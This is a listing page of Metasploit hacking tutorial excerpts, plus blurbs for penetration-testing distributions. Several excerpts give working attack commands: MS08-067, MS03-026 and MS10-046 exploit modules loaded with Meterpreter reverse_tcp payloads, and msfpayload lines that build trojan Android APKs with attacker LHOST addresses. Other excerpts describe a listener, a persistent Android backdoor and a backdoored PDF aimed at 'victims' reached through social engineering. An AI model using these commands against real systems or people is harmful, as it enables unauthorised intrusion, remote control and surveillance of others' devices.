PRINT
PRINT
SEND MAIL
SEND MAIL

Category: METASPLOIT TUTORIALS

Debian

Cerberus Linux v3

  Cerberus Linux v3  Cerberus is a penetration testing distribution focusing on automation and anonymity , it aims to have the best tools available on the hacking scene tools like Fuzzbunch, Dandespritz, Cobalt strike, Armitage, Metasploit framework and Metasploit community version set up and ready for use!! It includes custom scripts, custom themes, custom icons!Cerberus distribution is based on Debian testing, it has the capability to use 3 repositories to install packages from kali repo,Debian repo, and cyber sec repo! Cerberus is an Angry…

Windows Hacking

Black Window 10 Enterprise

Black Window 10 Enterprise is the first windows based penetration testing distribution with linux integraded ! The system comes activated with a digital license for windows enterprise ! It supports windows apps and linux apps, gui and terminal apps! It comes with a tone off hacking tools plus all the tools that are included with the latest release of cerberus linux! It has managed to implement cerberus os within windows.Offers the stability of a windows system and it offers the hacking part with a…

METASPLOIT TUTORIALS

Announcing the Metasploitable3 Community CTF

Been waiting for the Linux version of Metasploitable3 to drop? We’ll do you one better: Metasploit is giving the community a week to rain shells on a penguin-shaped Metasploitable3 instance—and to win prizes at the end of it. Play starts December 4; see below for full competition details. TL;DR: Sign up, drop shells, win stuff. Not into capturing flags but jonesing for a look at the code? We’ll release the Linux Metasploitable3 source code to the community soon after the competition ends. Happy hacking!…

METASPLOIT TUTORIALS

How to Remotely Grab a Screenshot of Someone’s Compromised Computer

Set Up the Hack First , let's select an exploit to use. Since he's using a Windows Server 2003 system, I like to use the MS08_067_ netapi exploit, so let's type: msf > use exploit/windows/smb/ms08_067_netapi To simplify our screen captures, we'll need to use Metasploit's Meterpreter payload. Let's load it into our exploit by: msf > (ms08_067_netapi) set payload windows/meterpreter/reverse_tcp Next, we need to set our options. At this point, I like to use the "show options" command to see what options are necessary to run…

METASPLOIT TUTORIALS

How to Take Control of Windows Server 2003 Remotely by Launching a Reverse Shell

Find an Exploit Now let's search for an appropriate exploit to hack into that 2003 system. Let's type: msf> search platform:windows type:exploit This should give us the list of exploits that we can use against Windows systems. In my Metasploit system, it returned numerous exploits as seen below. Step 2Pick Your Favorite Let's choose a tried and true exploit that is almost always successful against Windows Server 2003, exploit /windows/dcerpc/ms03_026_dcom. Type: msf > use exploit/windows/dcerpc/ms03_026_dcom To get more info on this exploit, let's type:…

METASPLOIT TUTORIALS

Sending Vulnerable Shortcut Files

Open Metasploit Let's start by opening Metasploit. You can do that by using the menu system in BackTrack, or more simply, typing: bt > msfconsole You will be greeted by a screen like this. Step 2Load the Exploit In this Windows 7 hack, we will be using an exploit that Microsoft numbers as MS10-045 in their Microsoft Security Bulletins and takes advantage of a buffer overflow in the shortcut dll. Let's load it by typing: msf > use windows/ms10_046_shortcut_icon_dllloader Step 3Get the Info Now that we have it loaded…

METASPLOIT TUTORIALS

Hacking an Android Device with MSFvenom

Summary In this Lab, we are going to learn how you can hack an Android mobile device using MSFvenom and Metasploit framework. Here, we will use MSFvenom for generating payload and save as an apk file and setup listener to Metasploit framework. Once user/victim download and install the malicious apk then, an attacker can easily get back session on Metasploit. An attacker needs to do some social engineering to install apk on victim mobile. We will demonstrate this by using following tools Kali Linux Android emulator Zipalign VMware or Virtual Box (virtual environment) Once the following setup is without any error,…

METASPLOIT TUTORIALS

Hack Android Using Kali (Remotely)

Fire-Up Kali: Open a terminal, and make a Trojan .apk You can do this by typing : msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP) You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section) Step 2Open Another Terminal: Open another terminal until the file is being produced. Load metasploit console, by typing : msfconsole Step 3Set-Up a Listener: After it loads(it will take time),…

METASPLOIT TUTORIALS

Create a Persistent Back Door in Android Using Kali Linux

Fire Up Kali and Hack an Android System: Use this guide to hack an android system on LAN. I'll be hacking on WAN, using a VM. Lets Create a backdoor by typing: msfpayload android/meterpreter/reverse_tcp LHOST=182.68.42.6 R > /root/abcde.apk Now, lets set-up a Listener: msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 192.168.0.4 exploit After the User/Victim Installs and opens the abcde.apk, Meterpreter Comes Up... Step 2Create a Persistent Script: Here.. Copy these commands in a notepad to create a script, and save it as anything.sh (The file extension…

METASPLOIT TUTORIALS

How to Embed a Backdoor Connection in an Innocent-Looking PDF

The Problem Adobe has had numerous security issues with their products, including Adobe Reader, Illustrator, Flash, and others. Security vulnerabilities is partly responsible for Apple forbidding Flash from their iOS. Adobe continues to be behind the curve in security, and as a result, millions of client-side systems are vulnerable. Among the most widely used Adobe products is Reader. Nearly every computer has some version of Adobe Reader on it for reading PDFs. You probably have it, too. But, most people are unaware of the…

METASPLOIT TUTORIALS

Creating Resource Script Files

Many times, when doing a pentest/hack, we need to run a number of Metasploit commands repeatedly. These commands may be exactly the same each time, and just like scripting, we may need to automatically run multiple Metasploit commands in a single step. Metasploit has the capability to save and store these "scripts," and they can then be recalled by the script name. Metasploit calls these scripts resource files.For example, in many attacks, we need to set up a multi/handler to connect to when a…